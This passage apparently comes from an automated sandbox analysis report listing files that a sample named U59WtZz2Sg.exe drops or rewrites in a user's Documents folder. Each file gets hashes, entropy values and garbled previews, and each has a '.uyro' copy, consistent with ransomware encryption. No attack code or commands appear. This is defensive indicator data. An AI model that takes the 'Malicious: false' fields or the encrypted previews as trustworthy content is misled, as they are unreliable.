SSDEEP:	24:wWCIeVQji77fIyeXniljNY6nelZxqakftvnFIJVCreUZ9UPRTpk/HL9n78rXWzgX:wBH77DeSl28RaktnFI3CrNbUPBa/pn7c
MD5:	7F34CC7D91CE77BA49C4C281BF964B0C
SHA1:	E5C6E76506D6AAAE66FCD376D4ED0726F4C8EB0E
SHA-256:	D8A325F52DAF957FDED0003EB1DA479A145BD3D090C030523FE74F7127668D70
SHA-512:	61C34F84133F19E62AB536AD59D378B5B8AE353C810FCB149C2B8A9392DD73CE38DE329A4B0AA2E78B23E151CBD65546F54D5C23B1BD21A4398E2D60E460A6D5
Malicious:	false
Reputation:	unknown
Preview:	BPMLN..x.RJ.p..,yg.......\2l.K.......(vO.,.S.A..0..P[..m..M..t.....-...'.c.n..;.........-......{....,j=.. .....!..k.<........1g..P.r.Hu....'~....6h.#..W...O1...y.V...........X........9...1.....-...(.+m.....A..,..`......H...e.sO...-bn%.E3%.9K.\|.!......go.<......@B9T.1....A.(I.SD.........!K.....5.N......#!...<p.....8z........Y._s.T..?...i........."....fJ....R....h]U.2T..P.#?qq.GW.<.g..oM.lx...R.-A.......-l....$.9.J.yXv70.,..S..&D..73.P.u...jk.XQ!...ms..9P...].7{...+.....lg.........yt...J.>\.....y...=........C......G.....9.._...=.`#.B..^H`D..x..`..Q$..M~..%..erS(.y>I..K..7.t.k.%.a.c..[*..x.;U0..........l..2....;....@..N-.B..>.....2..g.g..].jvy....a.9@XM...<s...Pv&..^...(.l+E9.m.._..S.n...!.>~.Q...JBD9.z..{..f....eN.......+S.7#..E........&....Q.........}q..<...;2."i9TS..5."(:..D.t.....g%.ujY..9-.2b\|.[e..{o.4..A...5.:..~E..N.OK.n.r.U...o..x....`a.H.C......{..u...F.e..nk.}..rY..)..o../...hK..s-..X.\|.p..).5R.=.\|.{..\}.d.o.!.2.%q.

C:\Users\user\Documents\BPMLNOBVSB.xlsx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.839111654562191
Encrypted:	false
SSDEEP:	24:wWCIeVQji77fIyeXniljNY6nelZxqakftvnFIJVCreUZ9UPRTpk/HL9n78rXWzgX:wBH77DeSl28RaktnFI3CrNbUPBa/pn7c
MD5:	7F34CC7D91CE77BA49C4C281BF964B0C
SHA1:	E5C6E76506D6AAAE66FCD376D4ED0726F4C8EB0E
SHA-256:	D8A325F52DAF957FDED0003EB1DA479A145BD3D090C030523FE74F7127668D70
SHA-512:	61C34F84133F19E62AB536AD59D378B5B8AE353C810FCB149C2B8A9392DD73CE38DE329A4B0AA2E78B23E151CBD65546F54D5C23B1BD21A4398E2D60E460A6D5
Malicious:	false
Reputation:	unknown
Preview:	BPMLN..x.RJ.p..,yg.......\2l.K.......(vO.,.S.A..0..P[..m..M..t.....-...'.c.n..;.........-......{....,j=.. .....!..k.<........1g..P.r.Hu....'~....6h.#..W...O1...y.V...........X........9...1.....-...(.+m.....A..,..`......H...e.sO...-bn%.E3%.9K.\|.!......go.<......@B9T.1....A.(I.SD.........!K.....5.N......#!...<p.....8z........Y._s.T..?...i........."....fJ....R....h]U.2T..P.#?qq.GW.<.g..oM.lx...R.-A.......-l....$.9.J.yXv70.,..S..&D..73.P.u...jk.XQ!...ms..9P...].7{...+.....lg.........yt...J.>\.....y...=........C......G.....9.._...=.`#.B..^H`D..x..`..Q$..M~..%..erS(.y>I..K..7.t.k.%.a.c..[*..x.;U0..........l..2....;....@..N-.B..>.....2..g.g..].jvy....a.9@XM...<s...Pv&..^...(.l+E9.m.._..S.n...!.>~.Q...JBD9.z..{..f....eN.......+S.7#..E........&....Q.........}q..<...;2."i9TS..5."(:..D.t.....g%.ujY..9-.2b\|.[e..{o.4..A...5.:..~E..N.OK.n.r.U...o..x....`a.H.C......{..u...F.e..nk.}..rY..)..o../...hK..s-..X.\|.p..).5R.=.\|.{..\}.d.o.!.2.%q.

C:\Users\user\Documents\FENIVHOIKN.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860412102338726
Encrypted:	false
SSDEEP:	24:T8a3W5BSbsBQ6VggeVExEULDWW+iO+6sSsVSYEZrMPHc6xwYIUdEM7v6+bD:wfy93geSLDWWVjOQH85M7v68D
MD5:	A3265A448A4E64C5042D9655F0EA03A9
SHA1:	2DB2577CE35DE610A30EA5B896955DF446CCC0FC
SHA-256:	F87AB19014E6F88EBD3B64DC21489B30743D29CF820DF1DA4F8C36A6B134C311
SHA-512:	B16BEA9CB3874A8B651E7489237937C21CC0F4C75A8DF2454B60E20E87E5E1DD20EB6058FEDBDB5AA70C719888A792072F515BACBC06B992716DC40B8B793AE1
Malicious:	false
Reputation:	unknown
Preview:	FENIV.....s.4j....F3........[.~z.4e.-vw...;.3.9../g.Z...o!....6LZZ.d......8z..E.0KhG......E.....S[-V?.....)y.z.. -".o........./@i".W.h@Tb.]Y..)..a.?...S.\.J....`)D...4.viM......Obod...C..%..1$...($...k. ..de.....&a.qg......&}-......q...@9........h...vj.yHLO\|. ..........`m.J.\|...N.2.G3P.d(..-A......:..&....nxJ.".....i...O'.....&....+...5i.\|{i2...tHUH..9....+J.xk..d..bS.(T.vFG......{.....[../.^.h..5...C.i.[.[.n_.D;.....?.e...=...N.V^7....Z.....\|Pd...Z...K\..Ay[.,z......:.~f'uM$........U.......#..xA....N.j.]..x.....:..0...H.e....m....Mr8#y....9)....aED..`...+S...Mv1W7.?\..:t..@s...5.d...q.d4....G.".xj..E`..\|fq&.b\|=......ho8.G.`W....$-$..cD(......~.!~n.....<.Q.jN.....i..%$;.....r.S.lR.;^<}./...%:b4'.t...T...w&.X....Q....)>BaQ..j....XM...p..9.`7...y...B.EJ..G.bQ_2....8...g.....*j.$.[....(/@...=.g..{...t..D...'...-.,!......5.....<Y...;.z.S..H.;...!.e.-...Id.;.$..F.-xg...}.u.M"..Y.. a.l.C.......\|.G.a...>...sc...E..Y.F5..1...;......F5...%j.2.,.....

C:\Users\user\Documents\FENIVHOIKN.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860412102338726
Encrypted:	false
SSDEEP:	24:T8a3W5BSbsBQ6VggeVExEULDWW+iO+6sSsVSYEZrMPHc6xwYIUdEM7v6+bD:wfy93geSLDWWVjOQH85M7v68D
MD5:	A3265A448A4E64C5042D9655F0EA03A9
SHA1:	2DB2577CE35DE610A30EA5B896955DF446CCC0FC
SHA-256:	F87AB19014E6F88EBD3B64DC21489B30743D29CF820DF1DA4F8C36A6B134C311
SHA-512:	B16BEA9CB3874A8B651E7489237937C21CC0F4C75A8DF2454B60E20E87E5E1DD20EB6058FEDBDB5AA70C719888A792072F515BACBC06B992716DC40B8B793AE1
Malicious:	false
Reputation:	unknown
Preview:	FENIV.....s.4j....F3........[.~z.4e.-vw...;.3.9../g.Z...o!....6LZZ.d......8z..E.0KhG......E.....S[-V?.....)y.z.. -".o........./@i".W.h@Tb.]Y..)..a.?...S.\.J....`)D...4.viM......Obod...C..%..1$...($...k. ..de.....&a.qg......&}-......q...@9........h...vj.yHLO\|. ..........`m.J.\|...N.2.G3P.d(..-A......:..&....nxJ.".....i...O'.....&....+...5i.\|{i2...tHUH..9....+J.xk..d..bS.(T.vFG......{.....[../.^.h..5...C.i.[.[.n_.D;.....?.e...=...N.V^7....Z.....\|Pd...Z...K\..Ay[.,z......:.~f'uM$........U.......#..xA....N.j.]..x.....:..0...H.e....m....Mr8#y....9)....aED..`...+S...Mv1W7.?\..:t..@s...5.d...q.d4....G.".xj..E`..\|fq&.b\|=......ho8.G.`W....$-$..cD(......~.!~n.....<.Q.jN.....i..%$;.....r.S.lR.;^<}./...%:b4'.t...T...w&.X....Q....)>BaQ..j....XM...p..9.`7...y...B.EJ..G.bQ_2....8...g.....*j.$.[....(/@...=.g..{...t..D...'...-.,!......5.....<Y...;.z.S..H.;...!.e.-...Id.;.$..F.-xg...}.u.M"..Y.. a.l.C.......\|.G.a...>...sc...E..Y.F5..1...;......F5...%j.2.,.....

C:\Users\user\Documents\JSDNGYCOWY.mp3

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.870105122434379
Encrypted:	false
SSDEEP:	24:bDXt4HA4EZVIlg777PbL6J8i34jxyxH2S6M21HHEb07Fr3B2+gPHOao+ybD:kAxVIlg7vPbOxIjxyXNkkoB2+qOGgD
MD5:	08B67B5FF5AFB35E48E96770C0D1CB49
SHA1:	140EECF7D9E58BBE038F05B654003AA39BE3CB47
SHA-256:	7739731DFE8AADF37306D00DFEFFE712FAA3971C8521FBE213F9C6E22247AD4A
SHA-512:	FF8B4473F6C9079DE79FF738AB4B086605DD761C9FC09A40BBCCFEB947CBDF0BD6B44F87281A7BEB636DB35350D4CE6B72F8AC4583AACD732B93D4C17381C446
Malicious:	false
Reputation:	unknown
Preview:	JSDNGP&&h.h...)........o.)...0..v.]....9q.SD..H..........#..PU..c.@..N.).R..2./.........]..q..+g...p4rC....H.....ZD...+...Y."..VCS,..t..K.5j4..........g.e...........f..k.R...87f.Jfo.=4..Y..........5........#.>.q..n...l.9.2.'(.W ...o...;...A.....6I..u].&.d..$7.k.....WW.....F\5].c}G\|...[v......L......V...d...tB...M!.......+Z.......`l~.1.i.5k......6.....b`....UG.cZ..@.2..E.8.D.gp.x.lf.......f.H(.1....m>._...u.`.U..5Z..Z.%bV.._...........r.A.1]..d,z...<.i..o..^.NJe&.H....8...`.$.9....3q.....].R.=r_.....Sj..sG..N..j'H.....8.{....qr.......{..`XMV.!W....k+m\|.TG.XK......0gj...1;/..S....M.hz.u..K.r........@....%..I..N99F....L4.ZH.[..Pi..n...I....r..+.U.....pbQ..S.p(=_Zk'..fu77C...H.-.v.{FdT..I.bZ..E.-c...>#~/'.W.......e..&.].?...L...\|.^..N.P.?D.FO..s...B,.e ...;.VZ.....jv...@....../.S....\L.R...v....@....T{K...m..#O...T..E.G.F....x......../.....lm.1..t.;D ...3:M5.n.>}..ek8z.8........t...:i....21........r....U.u~1...!'.c.r...[....D.u&".

C:\Users\user\Documents\JSDNGYCOWY.mp3.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.870105122434379
Encrypted:	false
SSDEEP:	24:bDXt4HA4EZVIlg777PbL6J8i34jxyxH2S6M21HHEb07Fr3B2+gPHOao+ybD:kAxVIlg7vPbOxIjxyXNkkoB2+qOGgD
MD5:	08B67B5FF5AFB35E48E96770C0D1CB49
SHA1:	140EECF7D9E58BBE038F05B654003AA39BE3CB47
SHA-256:	7739731DFE8AADF37306D00DFEFFE712FAA3971C8521FBE213F9C6E22247AD4A
SHA-512:	FF8B4473F6C9079DE79FF738AB4B086605DD761C9FC09A40BBCCFEB947CBDF0BD6B44F87281A7BEB636DB35350D4CE6B72F8AC4583AACD732B93D4C17381C446
Malicious:	false
Reputation:	unknown
Preview:	JSDNGP&&h.h...)........o.)...0..v.]....9q.SD..H..........#..PU..c.@..N.).R..2./.........]..q..+g...p4rC....H.....ZD...+...Y."..VCS,..t..K.5j4..........g.e...........f..k.R...87f.Jfo.=4..Y..........5........#.>.q..n...l.9.2.'(.W ...o...;...A.....6I..u].&.d..$7.k.....WW.....F\5].c}G\|...[v......L......V...d...tB...M!.......+Z.......`l~.1.i.5k......6.....b`....UG.cZ..@.2..E.8.D.gp.x.lf.......f.H(.1....m>._...u.`.U..5Z..Z.%bV.._...........r.A.1]..d,z...<.i..o..^.NJe&.H....8...`.$.9....3q.....].R.=r_.....Sj..sG..N..j'H.....8.{....qr.......{..`XMV.!W....k+m\|.TG.XK......0gj...1;/..S....M.hz.u..K.r........@....%..I..N99F....L4.ZH.[..Pi..n...I....r..+.U.....pbQ..S.p(=_Zk'..fu77C...H.-.v.{FdT..I.bZ..E.-c...>#~/'.W.......e..&.].?...L...\|.^..N.P.?D.FO..s...B,.e ...;.VZ.....jv...@....../.S....\L.R...v....@....T{K...m..#O...T..E.G.F....x......../.....lm.1..t.;D ...3:M5.n.>}..ek8z.8........t...:i....21........r....U.u~1...!'.c.r...[....D.u&".

C:\Users\user\Documents\KZWFNRXYKI.docx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.84317950346333
Encrypted:	false
SSDEEP:	24:PvaeqrkiQhKdxVYc/7j9Th5aojOC6J3OyvBDX52ZlCKxyKbD:PvR9IdzYE9/56FOyvBDX52eKfD
MD5:	A1BF1109D9D5E9311D3DE2C279254523
SHA1:	64F9B1BBC3342022242105B12DB69A2742F3B4EE
SHA-256:	DDCEF6DE2AEE0CFE8879BA736A2719AAD418DC08AE1458B889E8E49BFB125CBE
SHA-512:	FC572D83595CEB2789283260968A071B708FA5779B31F1E3A1D2DE2605D7C15E5189A69408B70DAFD204C7CB2381A49C45ED6C4A5D19DA3F87D0834A5C44DC33
Malicious:	false
Reputation:	unknown
Preview:	KZWFNB..m./.a.N...w..x.<..'l.&.i......Q.Yx.,....Vl.E!W.......`..X.h..EiS...D6.Qs$...7Et...M3.....4.R.p..L..2z....!.1.fn....E5\|..h...=....i.qg7.%/.....R.E..S.......D...wii.R....Z..........6.......5.&.+..#}.~.=.uP..T=.\r%q....0W.em..TO7.1M 2.\...yr.Nx.`.....`...P...z.wf.E../Z_.p.y....G.D...g-;.bm.=.&@......m.lZ...O..x...@.......<....... p...b-..GG.......C...HQs."m.u..b.~....e...f&B.x...q.R.......6.=..2...a. .....QTO.c.g.6Bk..O0...0.B.%%.(Q...,.:b.?...y.3D..4<..)J%...K....4. T.;n5.....G.h...LD....7%e...a........'........v`...6.\7H...h..0#....#...s.QB.$. .8......y3..0.]............._..7.7n.\..9.Uu.h..S}0.&i.G....>....3...m...M>y2.............G.b..j#....rg+P...U...R.#k8U8.,I.Q.fMqV.uP.....{.6D.^..v.>.]..m>f.S.{....SI.;..?....X..S.2...&.Z........G.Bi\..8...v......x....#.0#...g{.B..Ut.r.":.>9S..2....\|),.P...0....s.`.&.K.....Q......w..b.)..."u3..6....\..e..&..l.K.....B.J..Sy..o19......9.+~.9j.^..*oX..M.D..M.q...[..........]1=...C..

C:\Users\user\Documents\KZWFNRXYKI.docx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.84317950346333
Encrypted:	false
SSDEEP:	24:PvaeqrkiQhKdxVYc/7j9Th5aojOC6J3OyvBDX52ZlCKxyKbD:PvR9IdzYE9/56FOyvBDX52eKfD
MD5:	A1BF1109D9D5E9311D3DE2C279254523
SHA1:	64F9B1BBC3342022242105B12DB69A2742F3B4EE
SHA-256:	DDCEF6DE2AEE0CFE8879BA736A2719AAD418DC08AE1458B889E8E49BFB125CBE
SHA-512:	FC572D83595CEB2789283260968A071B708FA5779B31F1E3A1D2DE2605D7C15E5189A69408B70DAFD204C7CB2381A49C45ED6C4A5D19DA3F87D0834A5C44DC33
Malicious:	false
Reputation:	unknown
Preview:	KZWFNB..m./.a.N...w..x.<..'l.&.i......Q.Yx.,....Vl.E!W.......`..X.h..EiS...D6.Qs$...7Et...M3.....4.R.p..L..2z....!.1.fn....E5\|..h...=....i.qg7.%/.....R.E..S.......D...wii.R....Z..........6.......5.&.+..#}.~.=.uP..T=.\r%q....0W.em..TO7.1M 2.\...yr.Nx.`.....`...P...z.wf.E../Z_.p.y....G.D...g-;.bm.=.&@......m.lZ...O..x...@.......<....... p...b-..GG.......C...HQs."m.u..b.~....e...f&B.x...q.R.......6.=..2...a. .....QTO.c.g.6Bk..O0...0.B.%%.(Q...,.:b.?...y.3D..4<..)J%...K....4. T.;n5.....G.h...LD....7%e...a........'........v`...6.\7H...h..0#....#...s.QB.$. .8......y3..0.]............._..7.7n.\..9.Uu.h..S}0.&i.G....>....3...m...M>y2.............G.b..j#....rg+P...U...R.#k8U8.,I.Q.fMqV.uP.....{.6D.^..v.>.]..m>f.S.{....SI.;..?....X..S.2...&.Z........G.Bi\..8...v......x....#.0#...g{.B..Ut.r.":.>9S..2....\|),.P...0....s.`.&.K.....Q......w..b.)..."u3..6....\..e..&..l.K.....B.J..Sy..o19......9.+~.9j.^..*oX..M.D..M.q...[..........]1=...C..

C:\Users\user\Documents\KZWFNRXYKI.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.863944528823545
Encrypted:	false
SSDEEP:	24:tkgb7PFCgDPs3To/KwAn/2JEQhbx1QSK5+ZMNRf6HsrRmFexpGEnpnxpbD:tPbDbFM2VX11o+WfHRDpZJD
MD5:	BBC463066DC521C1D4720E94A9DF1D0C
SHA1:	68D92ABDC8708CEA99A93794C612EBE0444F55CB
SHA-256:	B1CAA6229491DCB206D03CB648C2B97D8B1970E2195A75757594905C2FCB1615
SHA-512:	AFBA625BD0AD1290FA3C7ADFBC7C1362C9EDB3B220DDDE4487AB3C95FD062EA483892DB947A253680800672EDE33B2AEE8C93715C21CEB2AF21313F05061D15E
Malicious:	false
Reputation:	unknown
Preview:	KZWFN&...R.]..._B..p.....\|.....G...:s-..omR.^.s".E...K\.O.,........a....O..c.........L.w.Y..pta.c....Z?Fg..QU..~b.:..'...%.Y.....1.....k....D%.m.V...63@=..A.%..f..........>.e.z.vE...#c.\|..:3.G.....Ur9l............pQWx.....~H...W.+.?n.%.:/.!.........Vi..U..A....OF4 .cw.TAo.24..b..0.GP......\|Q..e.S.....-....jA.3J.}..,K.:.,..... ....kx.^...sl..g..I....-..k..y......6L..!.c.....\|..S..).1...R.[.Y...F.#..L<V#.2........T..p"Q.......lR.Cf.N....j.r...w.ig.{....~.^Z7...U..oH..S%.....b.h.../.BHM:n1+........76...~fe...<..8.<...x.......=~U.$.w.00GK....G[.......#m}=G..O6.....=...Z.Y...Hs...R~.........o.5...+3..... ..d...{.s.%!_......t..#...q~..@%.0....._.."g....;`0.j.t..b....[_.#..w.......\..U.......\|.+.HY7.p.@..W\.....G9.U.N..9n3.sQ....F.S....0...eD...2...2....7s...k.HT.\;.dG..L..v.~..e.SW{L....k}.....U....n.,..t.6..W.<..a'.E.5...(..].....8..F.>..>^..GK..&f_ DESH.#...J..H.gR..j....{...n.!b.....P&?&..../q.V.>fn../........M=.......+..N.....a8

C:\Users\user\Documents\KZWFNRXYKI.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.863944528823545
Encrypted:	false
SSDEEP:	24:tkgb7PFCgDPs3To/KwAn/2JEQhbx1QSK5+ZMNRf6HsrRmFexpGEnpnxpbD:tPbDbFM2VX11o+WfHRDpZJD
MD5:	BBC463066DC521C1D4720E94A9DF1D0C
SHA1:	68D92ABDC8708CEA99A93794C612EBE0444F55CB
SHA-256:	B1CAA6229491DCB206D03CB648C2B97D8B1970E2195A75757594905C2FCB1615
SHA-512:	AFBA625BD0AD1290FA3C7ADFBC7C1362C9EDB3B220DDDE4487AB3C95FD062EA483892DB947A253680800672EDE33B2AEE8C93715C21CEB2AF21313F05061D15E
Malicious:	false
Reputation:	unknown
Preview:	KZWFN&...R.]..._B..p.....\|.....G...:s-..omR.^.s".E...K\.O.,........a....O..c.........L.w.Y..pta.c....Z?Fg..QU..~b.:..'...%.Y.....1.....k....D%.m.V...63@=..A.%..f..........>.e.z.vE...#c.\|..:3.G.....Ur9l............pQWx.....~H...W.+.?n.%.:/.!.........Vi..U..A....OF4 .cw.TAo.24..b..0.GP......\|Q..e.S.....-....jA.3J.}..,K.:.,..... ....kx.^...sl..g..I....-..k..y......6L..!.c.....\|..S..).1...R.[.Y...F.#..L<V#.2........T..p"Q.......lR.Cf.N....j.r...w.ig.{....~.^Z7...U..oH..S%.....b.h.../.BHM:n1+........76...~fe...<..8.<...x.......=~U.$.w.00GK....G[.......#m}=G..O6.....=...Z.Y...Hs...R~.........o.5...+3..... ..d...{.s.%!_......t..#...q~..@%.0....._.."g....;`0.j.t..b....[_.#..w.......\..U.......\|.+.HY7.p.@..W\.....G9.U.N..9n3.sQ....F.S....0...eD...2...2....7s...k.HT.\;.dG..L..v.~..e.SW{L....k}.....U....n.,..t.6..W.<..a'.E.5...(..].....8..F.>..>^..GK..&f_ DESH.#...J..H.gR..j....{...n.!b.....P&?&..../q.V.>fn../........M=.......+..N.....a8

C:\Users\user\Documents\KZWFNRXYKI.xlsx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.865028779926033
Encrypted:	false
SSDEEP:	24:tnX+FekAOZbJ07LFaEmrIeDHnBBN4OmOPdu58uOzTubD:tnXBOZ101TeDHBBZ3PdErD
MD5:	40A3E42160EBA6AA85537C7F1E3A1521
SHA1:	413DA8188B698ED1E36AF7338FB1A902388C8E92
SHA-256:	08CDC47AAFB637FB0836FC13A492C10AC71222B2BFF9BF785D6191F4F256973A
SHA-512:	4C82C79ABC6160ED69D49BE3D5E97BF209A5421103C5CCED75750C9A37E5ACB5DB8D7E6D37FCA58F5F265D4B937A61549BA35BB1A857F7981C6FC1782CC7C14A
Malicious:	false
Reputation:	unknown
Preview:	KZWFN.e..3...M.D.&.B?.]-D.p4..w.35..yxx]Q.u....9...u..q..u...b....."..PF.x....\g.`...9..=..>.$m?.~N.n...\|.c.K.?....y"mh.D...q.u......=Lo <(7wY..ip<..C........?.U.-I..x..2.e..u..SIW6...!/....._...e=.4cw;.s.......L.qT...........9h.3.v2YVX..F7._........ W..<B?.S..o..h.>........v#.K..b.-w\^1AGp2g4M.(V.v.......c+Pb..~.....j,.S..V...'.7D...A..>a...)4..g.g.l..K.7#.l..eT.....f&YW:.....y;..jAzW..}..(w`.(.6..!$.>............Aj..&.W.....K.v<..jRU."..b.gM.M~j.^M..A.;.>.......@..u.#..QU5e..x...rp,25...8.....%.5.^W....."....(...'..w.ow.(.GK9&.....4.!....I.8...F.Y@3..a!..[....,.u.?L....d.)6[....'.9..(...9.3......K\|.`..{.>.N.K+.H.T/....:.`1....,..)%.._.).#.\|...NC......>.\.=...\|o...%..e...d.6.j...x......./7.r...F.i .w...x.....y.\.fZ.....U}.{.-...G)e...nv..\....`..".g..0.a.ys.L......Wr..y...!rz.cEx\..l.k.e~.?=...2..mYU..^..7\|!.s.........".6...."...^,... .u...8 i.w..c.q..>g.Q.H........".R.T...q...b.p..RL..z#....9..z...g9j.zC....~....;.-,.N...

C:\Users\user\Documents\KZWFNRXYKI.xlsx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.865028779926033
Encrypted:	false
SSDEEP:	24:tnX+FekAOZbJ07LFaEmrIeDHnBBN4OmOPdu58uOzTubD:tnXBOZ101TeDHBBZ3PdErD
MD5:	40A3E42160EBA6AA85537C7F1E3A1521
SHA1:	413DA8188B698ED1E36AF7338FB1A902388C8E92
SHA-256:	08CDC47AAFB637FB0836FC13A492C10AC71222B2BFF9BF785D6191F4F256973A
SHA-512:	4C82C79ABC6160ED69D49BE3D5E97BF209A5421103C5CCED75750C9A37E5ACB5DB8D7E6D37FCA58F5F265D4B937A61549BA35BB1A857F7981C6FC1782CC7C14A
Malicious:	false
Reputation:	unknown
Preview:	KZWFN.e..3...M.D.&.B?.]-D.p4..w.35..yxx]Q.u....9...u..q..u...b....."..PF.x....\g.`...9..=..>.$m?.~N.n...\|.c.K.?....y"mh.D...q.u......=Lo <(7wY..ip<..C........?.U.-I..x..2.e..u..SIW6...!/....._...e=.4cw;.s.......L.qT...........9h.3.v2YVX..F7._........ W..<B?.S..o..h.>........v#.K..b.-w\^1AGp2g4M.(V.v.......c+Pb..~.....j,.S..V...'.7D...A..>a...)4..g.g.l..K.7#.l..eT.....f&YW:.....y;..jAzW..}..(w`.(.6..!$.>............Aj..&.W.....K.v<..jRU."..b.gM.M~j.^M..A.;.>.......@..u.#..QU5e..x...rp,25...8.....%.5.^W....."....(...'..w.ow.(.GK9&.....4.!....I.8...F.Y@3..a!..[....,.u.?L....d.)6[....'.9..(...9.3......K\|.`..{.>.N.K+.H.T/....:.`1....,..)%.._.).#.\|...NC......>.\.=...\|o...%..e...d.6.j...x......./7.r...F.i .w...x.....y.\.fZ.....U}.{.-...G)e...nv..\....`..".g..0.a.ys.L......Wr..y...!rz.cEx\..l.k.e~.?=...2..mYU..^..7\|!.s.........".6...."...^,... .u...8 i.w..c.q..>g.Q.H........".R.T...q...b.p..RL..z#....9..z...g9j.zC....~....;.-,.N...

C:\Users\user\Documents\KZWFNRXYKI\BPMLNOBVSB.xlsx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8551891310873785
Encrypted:	false
SSDEEP:	24:ICM4Gk/mGrhsHbKRL5zeB4uJeWBSVH7t+GpsEmfBNwmaHaEJzBIf70bD:INkuGrhcmRL56rMYSVH7wGSEmfBE6SMi
MD5:	98B4E28A4E9EC3AAA6FD5CAD9D44CBB9
SHA1:	C5816F8B495AE2E0C3D8DC7B539C0957025C0FB5
SHA-256:	DAFC0825EAA0A4E7F9AF318D9A3B9C378815E09EC935CA11E50FBF8875F35C92
SHA-512:	9345CFAE62AC44EDA7E46AFEEEE04976FE316CF0E4B23181136BD46A03253CB657A855402E1B3D0211D755A2DAE5A5963849CB741DC92933EF3FB39768D81BC8
Malicious:	false
Reputation:	unknown
Preview:	BPMLN..=f1..Z.J2\...`.].w......UZ...Y..Y.T.c.....8,1.}.8...T.8y..1S.`.H.....g6..~Z..M..I(i.K...N..x..'..<C.....w.Z..imO......4..a...+..{.V.w....9).._r..(..+SG15...=...s.c.M..`>...-...$....GN..S..-.....X......A4.mIf..L..R...<~X....,f-....K......\.....o..p.VS..W...\|zw..k.....>X..QZ...B.L..+.q.4].5....a.....T.]...S..;...d.h.....F.........K...B. .X@,n.^..%...H...E.N..d.c.E.r.....F..UH..@.....'U.E.".E.~w..\|..........{.%B;T........[.W...u..e.._G...M......RBi>.l..._.....M..a.....RCW....=.O...L.......v?...Vz]v..O.....hH.....'}.......8....&.A1\|,.w..................._.d`..t._..B..!f.R...L..G.a..........p.U'.4..'...b.w..!".V..@.cO...T/...)......w.B......t.z......{.\| ..%2^.'...... ..t7.?.vB%s.h......n.c.....s..h..(i..d)%:Z9..x..\.{/...!t.F].Qo.e4..!.'.L..hb....52.c......q.s....{sK.w.....m".W.4.uch.il......3m..$.....:Z.#...P.2.(dg.;.fA.a.@9.}2..............L2...2.EG]....x.n.l)......B.>...5DV.....-.........Y..\|G.bjMHbql$..z.....O/l.j.....b

C:\Users\user\Documents\KZWFNRXYKI\BPMLNOBVSB.xlsx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8551891310873785
Encrypted:	false
SSDEEP:	24:ICM4Gk/mGrhsHbKRL5zeB4uJeWBSVH7t+GpsEmfBNwmaHaEJzBIf70bD:INkuGrhcmRL56rMYSVH7wGSEmfBE6SMi
MD5:	98B4E28A4E9EC3AAA6FD5CAD9D44CBB9
SHA1:	C5816F8B495AE2E0C3D8DC7B539C0957025C0FB5
SHA-256:	DAFC0825EAA0A4E7F9AF318D9A3B9C378815E09EC935CA11E50FBF8875F35C92
SHA-512:	9345CFAE62AC44EDA7E46AFEEEE04976FE316CF0E4B23181136BD46A03253CB657A855402E1B3D0211D755A2DAE5A5963849CB741DC92933EF3FB39768D81BC8
Malicious:	false
Reputation:	unknown
Preview:	BPMLN..=f1..Z.J2\...`.].w......UZ...Y..Y.T.c.....8,1.}.8...T.8y..1S.`.H.....g6..~Z..M..I(i.K...N..x..'..<C.....w.Z..imO......4..a...+..{.V.w....9).._r..(..+SG15...=...s.c.M..`>...-...$....GN..S..-.....X......A4.mIf..L..R...<~X....,f-....K......\.....o..p.VS..W...\|zw..k.....>X..QZ...B.L..+.q.4].5....a.....T.]...S..;...d.h.....F.........K...B. .X@,n.^..%...H...E.N..d.c.E.r.....F..UH..@.....'U.E.".E.~w..\|..........{.%B;T........[.W...u..e.._G...M......RBi>.l..._.....M..a.....RCW....=.O...L.......v?...Vz]v..O.....hH.....'}.......8....&.A1\|,.w..................._.d`..t._..B..!f.R...L..G.a..........p.U'.4..'...b.w..!".V..@.cO...T/...)......w.B......t.z......{.\| ..%2^.'...... ..t7.?.vB%s.h......n.c.....s..h..(i..d)%:Z9..x..\.{/...!t.F].Qo.e4..!.'.L..hb....52.c......q.s....{sK.w.....m".W.4.uch.il......3m..$.....:Z.#...P.2.(dg.;.fA.a.@9.}2..............L2...2.EG]....x.n.l)......B.>...5DV.....-.........Y..\|G.bjMHbql$..z.....O/l.j.....b

C:\Users\user\Documents\KZWFNRXYKI\KZWFNRXYKI.docx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855637771303948
Encrypted:	false
SSDEEP:	24:wWJw3HEBiGtWNCy3Vs/B1yQTkXEK0hprXWybD:3CQikd/B0QTk09pjPD
MD5:	1FA61324D950021650F66389AE01CB23
SHA1:	24C1E1D55E04F331A951254EB8326FD3CF536093
